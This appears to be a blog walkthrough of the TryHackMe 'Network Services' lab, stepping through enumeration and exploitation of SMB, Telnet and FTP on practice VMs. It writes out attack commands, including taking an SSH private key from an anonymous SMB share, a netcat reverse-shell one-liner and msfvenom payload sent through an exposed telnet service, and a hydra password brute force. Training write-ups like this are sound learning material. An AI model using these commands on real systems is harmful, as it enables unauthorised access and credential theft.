TryHackMe - Network Services - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the Network Services room hosted at https://tryhackme.com/room/networkservices . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed vulnerable VM clients as the the victim machines.Task 1 - Get Connected
Questions
Ready? Let's get going!
No answer needed
Task 2 - Understanding SMB
Questions
What does SMB stand for?
Answer contained within Task description.
What type of protocol is SMB?
Answer contained within Task description.
What do clients connect o servers using?
Answer contained wtihin Task description.
What systems does Samba run on?
Answer contained within Task description.
Task 3 - Enumerating SMB
Questions
Conduct an nmap scan of your choosing, How many ports are open?
nmap -p- -T4 10.10.49.163
What ports is SMB running on?
nmap -p- -T4 10.10.49.163
Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
enum4linux -a 10.10.49.163 | grep -i “domain/workgroup”
What comes up as the name of the machine?
enum4linux -a 10.10.49.163
What operating system version is running?
enum4linux -a 10.10.49.163 | grep -i “os version”
What share sticks out as something we might want to investigate?
enum4linux -a 10.10.49.163
Task 4 - Exploiting SMB
Questions
What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
Answer contained within Task description.
Great! Now you've got a hang of the syntax, let's have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.
No answer needed
Does the share allow anonymous access? Y/N?
smbclient //10.10.49.163/<answerFromPreviousTask> -U Anonymous
input blank password
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
dir
get “Working From Home Information.txt”
exit
cat Working\ From\ Home\ Information.txt
What service has been configured to allow him to work from home?
cat Working\ From\ Home\ Information.txt
Okay! Now we know this, what directory on the share should we look in?
smbclient //10.10.49.163/<answerFromPreviousTask> -U Anonymous
input blank password
dir
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
cd <answer from previous question>
dir
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.
What is the smb.txt flag?
get <answer from previous question>
exit
chmod 600 <answer from previous question>
ssh -i <answer from previous question> <answer from previous question>@10.10.49.163
yes
cat smb.txt
Task 5 - Understanding Telnet
Questions
What is Telnet?
Answer contained within Task description
What has slowly replaced Telnet?
Answer contained within Task description
How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
Answer contained within Task description
The lack of what, means that all Telnet communication is in plaintext?
Research how plaintext is converted to ciphertext. That process is the answer.
Task 6 - Enumerating Telnet
Questions
How many ports are open on the target machine?
nmap -p- -A 10.10.11.225
What port is this?
nmap -p- -A 10.10.11.225
This port is unassigned, but still lists the protocol it's using, what protocol is this?
nmap -p- -A 10.10.11.225
Now re-reun the nmap scan, without the -p- tag, how many ports show up as open?
nmap -A 10.10.11.225
Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
No answer needed
Based on the title returned to us, what do we think this port could be used for?
nmap -p- -A 10.10.11.225
nmap -p- -A 10.10.11.225
Who could it belong to? Gathering possible usernames is an important step in enumeration.
nmap -p- -A 10.10.11.225
Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.
No answer needed
Task 7 - Exploiting Telnet
Questions
Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
No answer needed
(unofficial)
telnet 10.10.11.225 8012
Great! It's an open telnet connection! What welcome message do we receive?
telnet 10.10.11.225 8012
Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
Experiment. Does the system return anything after you input any commands?
Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.
No answer needed
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
No answer needed
(unofficial)
sudo tcpdump ip proto \\icmp -i eth0
Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
ip addr
from telnet terminal:
.RUN ping 10.10.213.12 -c 1
Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!
No answer needed
What word does the generated payload start with?
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.213.12 lport=4444 R
What would the command look like for the listening port we selected in our payload?
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.213.12 lport=4444 R
Combine this information with the command string listed in the Task description, replacing [listening port] with the variable found in the screenshot above.
Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!
No answer needed
(unofficial)
nc -lvp 4444
on telnet terminal:
.RUN mkfifo /tmp/rvyrqt; nc 10.10.213.12 4444 0</tmp/rvyrqt | /bin/sh >/tmp/rvyrqt 2>&1; rm /tmp/rvyrqt
Success! What is the contents of flag.txt?
cat flag.txt
Task 8 - Understanding FTP
Questions
What communications model does FTP use?
Answer contained within Task description
What's the standard FTP port?
Google"ftp port" for the answer
How many modes of FTP connection are there?
Answer contained within Task description
Task 9 - Enumerating FTP
Questions
How many ports are open on the target machine?
nmap -p- 10.10.91.132
nmap -F -sU 10.10.91.132
What port is ftp running on?
FTP is running on the “standard” port.
What variant of FTP is running on it?
nmap -p21 -sV 10.10.91.132
What is the name of the file in the anonymous FTP directory?
ftp 10.10.91.132
anonymous
input blank password
dir
What do we think a possible username could be?
get PUBLIC_NOTICE.txt
exit
cat PUBLIC_NOTICE.txt
Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that...
No answer needed
Task 10 - Exploiting FTP
Questions
What is the password for the user "mike"?
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.91.132 ftp
Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted
No answer needed
What is ftp.txt?
ftp 10.10.91.132
mike
password: password
get ftp.txt
exit
cat ftp.txt
Task 11 - Expanding Your Knowledge
Questions
Well done, you did it!
No answer needed
Finish
Comments
Post a Comment